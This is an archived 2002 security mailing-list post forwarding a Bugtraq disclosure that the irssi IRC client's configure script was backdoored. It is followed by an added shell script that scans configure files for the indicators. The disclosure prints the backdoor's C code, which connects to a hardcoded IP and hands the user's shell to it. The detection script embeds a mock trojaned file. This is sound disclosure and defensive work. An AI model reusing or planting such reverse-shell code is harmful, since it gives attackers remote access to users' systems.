
Archive: May 2002 ml@sikurezza.org
Subject: Fwd: irssi backdoored.
Sender: Tornado [ALPT]
Date: 27 May 2002 11:22:13 -0000
---------- Fwd ----------
Subject: irssi backdoored.
Date: Sat, 25 May 2002 16:58:05 +0200
From: Martin Östlund <martin@webtech.se>
To: bugtraq@securityfocus.com
Hi readers.
I just discovered this on the irssi homepage (irssi is a new, popular
IRC chat client for those who didn't know).
"Just noticed, not sure for how long it's been there. I heard the first
change in the irssi-0.8.4.tar.gz's checksum was 2002/04/19. Guess I'll
have to start watching those myself from now on.. I'm moving the
main.irssi.org elsewhere for now, mirrors should pick up the DNS change
and update themselves automatically..
This code was found from configure - it forks a new process, connects to
some server and gives stdin/out/err to it (ie. giving remote access to
your account):
    int s;
    struct sockaddr_in sa;
    switch(fork()) { case 0: break; default: exit(0); }
    if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
        exit(1);
    }
    /* HP/UX 9 (%@#!) writes to sscanf strings */
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(6667);
    sa.sin_addr.s_addr = inet_addr("204.120.36.206");
    if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
        exit(1);
    }
    dup2(s, 0); dup2(s, 1); dup2(s, 2);
Also the IP just changed yesterday from 209.164.15.215. If you still
have the irssi sources, you can see if you're affected with grep
SOCK_STREAM configure - if it returns anything, something might have
been done to your system."
- End of quote.
Take care,
Martin Östlund.
-------------- Fwd ----------------
Nice, isn't it?
--
Linux registered user: #256463
icq: 43500551
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
What was the world born from???
From the Segmentation Fault of God's program
By ALPT
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
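
Added example (not part of the original post or of the irssi project): the "grep SOCK_STREAM configure" check from the quoted notice, wrapped in a shell function and applied to every configure script under a directory. The function names, the extra indicator patterns and the sample tree (which uses the documentation address 192.0.2.1) are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# check_configure FILE
# Returns 0 if clean, 1 if SOCK_STREAM appears (the check quoted in the post),
# 2 if the file cannot be read. Matching lines are printed for triage.
check_configure() {
    file=$1
    [ -r "$file" ] || { echo "cannot read: $file" >&2; return 2; }
    if ! grep -n 'SOCK_STREAM' "$file"; then
        return 0
    fi
    # Supporting indicators taken from the quoted snippet (an assumption:
    # the post itself names only SOCK_STREAM). Shown to help triage.
    grep -nE 'inet_addr\("[0-9.]+"\)|dup2\(|htons\(' "$file" || true
    return 1
}

# scan_tree DIR
# Prints the path of every flagged configure script under DIR.
# Unreadable files are flagged too (fail closed). Returns 1 if any are flagged.
scan_tree() {
    flagged=$(find "$1" -type f -name configure | while IFS= read -r f; do
        check_configure "$f" >/dev/null 2>&1 || printf '%s\n' "$f"
    done)
    [ -z "$flagged" ] && return 0
    printf '%s\n' "$flagged"
    return 1
}

# Constructed sample tree (not real irssi sources): one clean script and one
# carrying lines modelled on the snippet quoted in the post.
demo=$(mktemp -d)
mkdir -p "$demo/clean-1.0" "$demo/trojaned-1.0"
printf '%s\n' '#!/bin/sh' 'echo "checking for gcc... yes"' > "$demo/clean-1.0/configure"
cat > "$demo/trojaned-1.0/configure" <<'EOF'
#!/bin/sh
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("192.0.2.1");
dup2(s, 0); dup2(s, 1); dup2(s, 2);
EOF

echo "Flagged configure scripts:"
scan_tree "$demo" || true
echo "Matching lines:"
check_configure "$demo/trojaned-1.0/configure" || true
rm -rf "$demo"
```

A clean result only shows that these strings are absent from configure; it does not show that the tarball is the one the author released.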